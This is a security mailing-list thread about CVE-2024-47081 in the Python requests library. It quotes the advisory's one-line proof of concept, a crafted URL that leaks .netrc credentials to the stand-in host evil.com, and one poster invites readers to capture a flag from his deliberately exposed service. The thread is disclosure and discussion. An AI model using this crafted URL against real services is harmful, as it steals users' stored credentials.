oss-sec mailing list archives
Re: CVE-2024-47081: Netrc credential leak in PSF requests library
From: Dave Walker <email () daviey com>
Date: Wed, 4 Jun 2025 00:12:12 +0100
Hi, Well, it's probably just a coincidence, but I literally just spun up a web service that does exactly this: https://isitup.daviey.com/ The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc: ``` machine localhost login *REDACTED* password CTF{*REDACTED*} ``` It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc. First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out. Thanks -- Kind Regards, Dave Walker On Tue, 3 Jun 2025 at 18:12, Alan Coopersmith <alan.coopersmith () oracle com> wrote:
[I'm not sure how the attacker is supposed to get the victim to make a requests call using a URL the attacker controls, but that didn't stop them from getting a CVE issued for this. -alan- ] -------- Forwarded Message -------- Subject: [FD] CVE-2024-47081: Netrc credential leak in PSF requests library Date: Sat, 31 May 2025 06:30:50 +0000 From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org> Reply-To: Juho Forsén <jupenur () protonmail ch> To: fulldisclosure () seclists org <fulldisclosure () seclists org> The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evil.com/') Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue. As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- CVE-2024-47081: Netrc credential leak in PSF requests library Alan Coopersmith (Jun 03)
- Re: CVE-2024-47081: Netrc credential leak in PSF requests library Dave Walker (Jun 03)
- Re: CVE-2024-47081: Netrc credential leak in PSF requests library Demi Marie Obenour (Jun 03)
- Re: CVE-2024-47081: Netrc credential leak in PSF requests library Jakub Wilk (Jun 04)